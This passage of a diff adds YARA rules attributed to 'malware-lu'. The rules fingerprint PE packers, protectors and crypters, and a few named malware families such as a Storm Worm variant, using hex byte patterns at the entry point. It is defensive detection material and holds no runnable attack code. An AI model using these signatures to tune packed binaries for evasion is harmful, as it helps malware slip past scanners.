+		$a0 = { 55 8B EC B9 0E 00 00 00 6A 00 6A 00 49 75 F9 51 53 56 57 B8 ?? ?? ?? ?? 90 90 90 90 90 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 A1 ?? ?? ?? ?? 83 C0 05 A3 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? 0D 00 00 00 E8 85 E2 FF FF 81 3D ?? ?? ?? ?? 21 7E 7E 40 75 7A 81 3D ?? ?? ?? ?? 43 52 43 33 75 6E 81 3D ?? ?? ?? ?? 32 40 7E 7E 75 62 81 3D ?? ?? ?? ?? 21 7E 7E 40 75 56 81 3D ?? ?? ?? ?? 43 52 43 33 75 4A 81 3D ?? ?? ?? ?? 32 40 7E 7E 75 3E 81 3D ?? ?? ?? ?? 21 7E 7E 40 75 32 81 3D ?? ?? ?? ?? 43 52 43 33 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PackMasterv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 01 00 00 00 E8 83 C4 04 E8 01 00 00 00 E9 5D 81 ED D3 22 40 00 E8 04 02 00 00 E8 EB 08 EB 02 CD 20 FF 24 24 9A 66 BE 47 46 }
+	$a1 = { 60 E8 01 ?? ?? ?? E8 83 C4 04 E8 01 ?? ?? ?? E9 5D 81 ED D3 22 40 ?? E8 04 02 ?? ?? E8 EB 08 EB 02 CD 20 FF 24 24 9A 66 BE 47 46 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule DBPEv153
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 55 57 56 52 51 53 9C FA E8 ?? ?? ?? ?? 5D 81 ED 5B 53 40 ?? B0 ?? E8 ?? ?? ?? ?? 5E 83 C6 11 B9 27 ?? ?? ?? 30 06 46 49 75 FA }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FreeJoiner152Stubengine16GlOFF
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 46 FD FF FF 50 E8 0C 00 00 00 FF 25 08 20 40 00 FF 25 0C 20 40 00 FF 25 10 20 40 00 FF 25 14 20 40 00 FF 25 18 20 40 00 FF 25 1C 20 40 00 FF 25 20 20 40 00 FF 25 24 20 40 00 FF 25 28 20 40 00 FF 25 00 20 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASProtectv12AlexeySolodovnikovh1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 60 E8 1B 00 00 00 E9 FC 8D B5 0F 06 00 00 8B FE B9 97 00 00 00 AD 35 78 56 34 12 AB 49 75 F6 EB 04 5D 45 55 C3 E9 ?? ?? ?? 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule FSGv110EngdulekxtBorlandDelphiMicrosoftVisualCx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 1B DB E8 02 00 00 00 1A 0D 5B 68 80 ?? ?? 00 E8 01 00 00 00 EA 5A 58 EB 02 CD 20 68 F4 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PENightMare2Beta
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E9 ?? ?? ?? ?? EF 40 03 A7 07 8F 07 1C 37 5D 43 A7 04 B9 2C 3A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MinGWGCC3x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 83 EC 08 C7 04 24 ?? 00 00 00 FF 15 ?? ?? ?? ?? E8 ?? ?? FF FF ?? ?? ?? ?? ?? ?? ?? ?? 55 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PIRITv15
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B4 4D CD 21 E8 ?? ?? FD E8 ?? ?? B4 51 CD 21 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Reg2Exe224byJanVorel
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6A 00 E8 CF 20 00 00 A3 F4 45 40 00 E8 CB 20 00 00 6A 0A 50 6A 00 FF 35 F4 45 40 00 E8 07 00 00 00 50 E8 BB 20 00 00 CC 68 48 00 00 00 68 00 00 00 00 68 F8 45 40 00 E8 06 19 00 00 83 C4 0C 8B 44 24 04 A3 FC 45 40 00 68 00 00 00 00 68 A0 0F 00 00 68 00 00 00 00 E8 8C 20 00 00 A3 F8 45 40 00 E8 02 20 00 00 E8 32 1D 00 00 E8 20 19 00 00 E8 A3 16 00 00 68 01 00 00 00 68 38 46 40 00 68 00 00 00 00 8B 15 38 46 40 00 E8 71 4F 00 00 B8 00 00 10 00 BB 01 00 00 00 E8 82 4F 00 00 FF 35 48 41 40 00 B8 00 01 00 00 E8 9D 15 00 00 8D 0D 1C 46 40 00 5A E8 82 16 00 00 68 00 01 00 00 FF 35 1C 46 40 00 E8 24 20 00 00 A3 24 46 40 00 FF 35 48 41 40 00 FF 35 24 46 40 00 FF 35 1C 46 40 00 E8 DC 10 00 00 8D 0D 14 46 40 00 5A E8 4A 16 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SVKProtectorv13xEngPavolCerven
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 EB 05 B8 ?? ?? 42 00 64 A0 23 00 00 00 EB 03 C7 84 E8 84 C0 EB 03 C7 84 E9 75 67 B9 49 00 00 00 8D B5 C5 02 00 00 56 80 06 44 46 E2 FA 8B 8D C1 02 00 00 5E 55 51 6A 00 56 FF 95 0C 61 00 00 59 5D 40 85 C0 75 3C 80 3E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ThinstallEmbedded2609Jitit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 58 BB AD 19 00 00 2B C3 50 68 ?? ?? ?? ?? 68 B0 1C 00 00 68 80 00 00 00 E8 35 FF FF FF E9 99 FF FF FF 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXcrypterarchphaseNWC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BF ?? ?? ?? 00 81 FF ?? ?? ?? 00 74 10 81 2F ?? 00 00 00 83 C7 04 BB 05 ?? ?? 00 FF E3 BE ?? ?? ?? 00 FF E6 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule StarForceProtectionDriverProtectionTechnology
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 57 68 ?? 0D 01 00 68 00 ?? ?? 00 E8 50 ?? FF FF 68 ?? ?? ?? 00 68 ?? ?? ?? 00 68 ?? ?? ?? 00 68 ?? ?? ?? 00 68 ?? ?? ?? 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FishPEV10Xhellfish
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? C3 90 09 00 00 00 2C 00 00 00 ?? ?? ?? ?? C4 03 00 00 BC A0 00 00 00 40 01 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 99 00 00 00 00 8A 00 00 00 10 00 00 ?? ?? 00 00 ?? ?? ?? ?? 00 00 02 00 00 00 A0 00 00 18 01 00 00 ?? ?? ?? ?? 00 00 0C 00 00 00 B0 00 00 38 0A 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 C0 00 00 40 39 00 00 ?? ?? ?? ?? 00 00 08 00 00 00 00 01 00 C8 06 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECrypter
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D EB 26 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElockv051
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { C1 EE 00 66 8B C9 EB 01 EB 60 EB 01 EB 9C E8 00 00 00 00 5E 83 C6 5E 8B FE 68 79 01 59 EB 01 EB AC 54 E8 03 5C EB 08 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule LY_WGKXwwwszleyucom
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 4D 79 46 75 6E 00 62 73 }
+
+condition:
+		$a0
+}
+	
+	
+rule ASProtect13321RegisteredAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 01 ?? ?? ?? E8 01 00 00 00 C3 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackV111ap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 4A 02 00 00 8D 9D 11 01 00 00 33 FF EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110EngdulekxtMicrosoftVisualC4xLCCWin321x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 2C 71 1B CA EB 01 2A EB 01 65 8D 35 80 ?? ?? 00 80 C9 84 80 C9 68 BB F4 00 00 00 EB 01 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule dePACKdeNULL
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 DD 60 68 00 ?? ?? ?? 68 ?? ?? 00 00 E8 ?? 00 00 00 }
+	$a1 = { EB 01 DD 60 68 00 ?? ?? ?? 68 ?? ?? ?? 00 E8 ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? D2 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule EXECryptorv1401
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 24 00 00 00 8B 4C 24 0C C7 01 17 00 01 00 C7 81 B8 00 00 00 00 ?? ?? 00 31 C0 89 41 14 89 41 18 80 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakePELockNT204emadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 03 CD 20 C7 1E EB 03 CD 20 EA 9C EB 02 EB 01 EB 01 EB 60 EB 03 CD 20 EB EB 01 EB E8 03 00 00 00 E9 EB 04 58 40 50 C3 EB 03 CD 20 EB EB 03 CD 20 03 61 9D 83 C4 04 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PELockNTv203
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 C7 85 1E EB 03 CD 20 C7 9C EB 02 69 B1 60 EB 02 EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Reg2Exe220221byJanVorel
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6A 00 E8 7D 12 00 00 A3 A0 44 40 00 E8 79 12 00 00 6A 0A 50 6A 00 FF 35 A0 44 40 00 E8 0F 00 00 00 50 E8 69 12 00 00 CC CC CC CC CC CC CC CC CC 68 2C 02 00 00 68 00 00 00 00 68 B0 44 40 00 E8 3A 12 00 00 83 C4 0C 8B 44 24 04 A3 B8 44 40 00 68 00 00 00 00 68 A0 0F 00 00 68 00 00 00 00 E8 32 12 00 00 A3 B0 44 40 00 68 F4 01 00 00 68 BC 44 40 00 FF 35 B8 44 40 00 E8 1E 12 00 00 B8 BC 44 40 00 89 C1 8A 30 40 80 FE 5C 75 02 89 C1 80 FE 00 75 F1 C6 01 00 E8 EC 18 00 00 E8 28 16 00 00 E8 4A 12 00 00 68 00 FA 00 00 68 08 00 00 00 FF 35 B0 44 40 00 E8 E7 11 00 00 A3 B4 44 40 00 8B 15 D4 46 40 00 E8 65 0A 00 00 BB 00 00 10 00 B8 01 00 00 00 E8 72 0A 00 00 74 09 C7 00 01 00 00 00 83 C0 04 A3 D4 46 40 00 FF 35 B4 44 40 00 E8 26 05 00 00 8D 0D B8 46 40 00 5A E8 CF 0F 00 00 FF 35 B4 44 40 00 FF 35 B8 46 40 00 E8 EE 06 00 00 8D 0D B4 46 40 00 5A E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PELockNTv201
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 03 CD 20 EB EB 01 EB 1E EB 01 EB EB 02 CD 20 9C EB 03 CD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PELockNTv204
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB ?? CD ?? ?? ?? ?? ?? CD ?? ?? ?? ?? ?? EB ?? EB ?? EB ?? EB ?? CD ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 50 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXFreakv01BorlandDelphiHMX0101
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 00 ?? ?? ?? 00 03 00 00 00 ?? ?? ?? ?? 00 10 00 00 00 00 ?? ?? ?? ?? 00 00 ?? F6 ?? 00 B2 4F 45 00 ?? F9 ?? 00 EF 4F 45 00 ?? F6 ?? 00 8C D1 42 00 ?? 56 ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 }
+	$a1 = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 00 ?? ?? ?? 00 03 00 00 00 ?? ?? ?? ?? 00 10 00 00 00 00 ?? ?? ?? ?? 00 00 ?? F6 ?? 00 B2 4F 45 00 ?? F9 ?? 00 EF 4F 45 00 ?? F6 ?? 00 8C D1 42 00 ?? 56 ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 34 50 45 00 ?? ?? ?? 00 FF FF 00 00 ?? 24 ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 40 00 00 C0 00 00 ?? ?? ?? ?? 00 00 ?? 00 00 00 ?? 1E ?? 00 ?? F7 ?? 00 A6 4E 43 00 ?? 56 ?? 00 AD D1 42 00 ?? F7 ?? 00 A1 D2 42 00 ?? 56 ?? 00 0B 4D 43 00 ?? F7 ?? 00 ?? F7 ?? 00 ?? 56 ?? 00 ?? ?? ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? 77 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 77 ?? ?? 00 00 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? 00 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule Obsidium13017Obsidiumsoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 ?? ?? E8 28 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Petite22c199899IanLuck
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 ?? ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 68 00 00 ?? ?? 8B 3C 24 8B 30 66 81 C7 80 07 8D 74 06 08 89 38 8B 5E 10 50 56 6A 02 68 80 08 00 00 57 6A ?? 6A 06 56 6A 04 68 80 08 00 00 57 FF D3 83 EE 08 59 F3 A5 59 66 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PluginToExev101BoBBobSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 29 C0 5D 81 ED C6 41 40 00 50 8F 85 71 40 40 00 50 FF 95 A5 41 40 00 89 85 6D 40 40 00 FF 95 A1 41 40 00 50 FF 95 B5 41 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 B9 41 40 00 89 85 75 40 40 00 EB 6C 6A 01 8F 85 71 40 40 00 6A 58 6A 40 FF 95 A9 41 40 00 89 85 69 40 40 00 89 C7 68 00 08 00 00 6A 40 FF 95 A9 41 40 00 89 47 1C C7 07 58 00 00 00 C7 47 20 00 08 00 00 C7 47 18 01 00 00 00 C7 47 34 04 10 88 00 8D 8D B9 40 40 00 89 4F 0C 8D 8D DB 40 40 00 89 4F 30 FF B5 69 40 40 00 FF 95 95 41 40 00 FF 77 1C 8F 85 75 40 40 00 8B 9D 6D 40 40 00 60 6A 00 6A 01 53 81 C3 ?? ?? ?? 00 FF D3 61 6A 00 68 44 69 45 50 FF B5 75 40 40 00 6A 00 81 C3 ?? ?? 00 00 FF D3 83 C4 10 83 BD 71 40 40 00 00 74 10 FF 77 1C FF 95 AD 41 40 00 57 FF 95 AD 41 40 00 6A 00 FF 95 9D 41 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Enigmaprotector110unregistered
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 72 80 72 88 72 8C 72 90 72 94 72 98 72 9C 72 A0 72 A4 59 A8 B0 5C E8 39 D5 39 E4 39 F1 31 F9 5C 3D 58 CA 5F 56 B1 2D 20 7A 2E 30 16 32 72 2B 72 36 1C A5 33 A9 9C AD 9C B1 9C B5 9C B9 9C BD 9C C1 9C C5 9C C9 9C CD 9C D1 9C D5 9C D9 9C DD 9C E1 9C E5 89 }
+	$a1 = { 60 72 80 72 88 72 8C 72 90 72 94 72 98 72 9C 72 A0 72 A4 59 A8 B0 5C E8 39 D5 39 E4 39 F1 31 F9 5C 3D 58 CA 5F 56 B1 2D 20 7A 2E 30 16 32 72 2B 72 36 1C A5 33 A9 9C AD 9C B1 9C B5 9C B9 9C BD 9C C1 9C C5 9C C9 9C CD 9C D1 9C D5 9C D9 9C DD 9C E1 9C E5 89 E9 51 0B C4 80 BC 7E 35 09 37 E7 C9 3D C9 45 C9 4D 74 92 BA E4 E9 24 6B DF 3E 0E 38 0C 49 10 27 80 51 A1 8E 3A A3 C8 AE 3B 1C 35 }
+
+condition:
+		$a0 or $a1
+}
+	
+	
+rule Obsidium1341ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 ?? E8 2A 00 00 00 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 21 EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 02 ?? ?? E8 C3 27 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WebCopsDLLLINKDataSecurity
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { A8 BE 58 DC D6 CC C4 63 4A 0F E0 02 BB CE F3 5C 50 23 FB 62 E7 3D 2B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01PackMaster10PEXCloneAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 01 01 00 00 E8 83 C4 04 E8 01 90 90 90 E9 5D 81 ED D3 22 40 90 E8 04 02 90 90 E8 EB 08 EB 02 CD 20 FF 24 24 9A 66 BE 47 46 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upackv037v038BetaStripbaserelocationtableOptionDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 18 33 C0 55 40 51 D3 E0 8B EA 91 FF 56 4C 33 }
+
+condition:
+		$a0
+}
+	
+	
+rule AHTeamEPProtector03fakeSVKP13xFEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 EB 05 B8 00 00 00 00 64 A0 23 00 00 00 EB 03 C7 84 E8 84 C0 EB 03 C7 84 E9 75 67 B9 49 00 00 00 8D B5 C5 02 00 00 56 80 06 44 46 E2 FA 8B 8D C1 02 00 00 5E 55 51 6A 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule InstallShieldCustom
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 EC 44 56 FF 15 ?? ?? 41 00 8B F0 85 F6 75 08 6A FF FF 15 ?? ?? 41 00 8A 06 57 8B 3D ?? ?? 41 00 3C 22 75 1B 56 FF D7 8B F0 8A 06 3C 22 74 04 84 C0 75 F1 80 3E 22 75 15 56 FF D7 8B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Petitevafterv14
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 66 9C 60 50 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 83 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeToolsv21EncruptorbyDISMEMBER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5D 83 ?? ?? 1E 8C DA 83 ?? ?? 8E DA 8E C2 BB ?? ?? BA ?? ?? 85 D2 74 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NTkrnlSecureSuiteNTkrnlteam
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 34 10 00 00 28 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 10 00 00 50 10 00 00 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 }
+
+condition:
+		$a0
+}
+	
+	
+rule PESpinv0b
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 72 C8 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 26 E8 01 00 00 00 EA 5A 33 C9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VXTibsZhelatinStormWormvariant
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FF 74 24 1C 58 8D 80 ?? ?? 77 04 50 68 62 34 35 04 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakePEX099emadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 01 00 00 00 E8 83 C4 04 E8 01 00 00 00 E9 5D 81 ED FF 22 40 00 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NSPack3xLiuXingPing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? FF FF ?? 38 01 0F 84 ?? 02 00 00 ?? 00 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv25RetailBitsumTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? 01 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 6F 6D 70 61 63 74 32 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WARNINGTROJANXiaoHui
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 9C E8 00 00 00 00 5D B8 ?? 85 40 00 2D ?? 85 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NFOv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8D 50 12 2B C9 B1 1E 8A 02 34 77 88 02 42 E2 F7 C8 8C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PMODEWv112116121133DOSextender
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FC 16 07 BF ?? ?? 8B F7 57 B9 ?? ?? F3 A5 06 1E 07 1F 5F BE ?? ?? 06 0E A4 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AaseCrypterbysantasdad
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 53 B8 A0 3E 00 10 E8 93 DE FF FF 68 F8 42 00 10 E8 79 DF FF FF 68 00 43 00 10 68 0C 43 00 10 E8 42 DF FF FF 50 E8 44 DF FF FF A3 98 66 00 10 83 3D 98 66 00 10 00 75 13 6A 00 68 18 43 00 10 68 1C 43 00 10 6A 00 E8 4B DF FF FF 68 2C 43 00 10 68 0C 43 ?? ?? ?? ?? DF FF FF 50 E8 0E DF FF FF A3 94 66 00 10 83 3D 94 66 00 10 00 75 13 6A 00 68 18 43 00 10 68 38 43 00 10 6A 00 E8 15 DF FF FF 68 48 43 00 10 68 0C 43 00 10 E8 D6 DE FF FF 50 E8 D8 DE FF FF A3 A0 66 00 10 83 3D A0 66 00 10 00 75 13 6A 00 68 18 43 00 10 68 58 43 00 10 6A 00 E8 DF DE FF FF 68 6C 43 00 10 68 0C 43 00 10 E8 A0 DE FF FF 50 E8 A2 DE FF FF }
+
+condition:
+		$a0
+}
+	
+	
+rule aPackv098bJibz
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 93 07 1F 05 ?? ?? 8E D0 BC ?? ?? EA }
+
+condition:
+		$a0
+}
+	
+	
+rule UPackv011Dwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 48 01 40 00 AD 8B F8 95 A5 33 C0 33 C9 AB 48 AB F7 D8 B1 04 F3 AB C1 E0 0A B5 1C F3 AB AD 50 97 51 AD 87 F5 58 8D 54 86 5C FF D5 72 5A 2C 03 73 02 B0 00 3C 07 72 02 2C 03 50 0F B6 5F FF C1 E3 03 B3 00 8D 1C 5B 8D 9C 9E 0C 10 00 00 B0 01 67 E3 29 8B D7 }
+
+condition:
+		$a0
+}
+	
+	
+rule NsPacKNetLiuXingPing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 BB 01 47 65 74 53 79 73 74 65 6D 49 6E 66 6F 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 5E 00 5F 43 6F 72 ?? ?? ?? 4D 61 69 6E 00 6D 73 63 6F 72 65 65 2E 64 6C 6C }
+
+condition:
+		$a0
+}
+	
+	
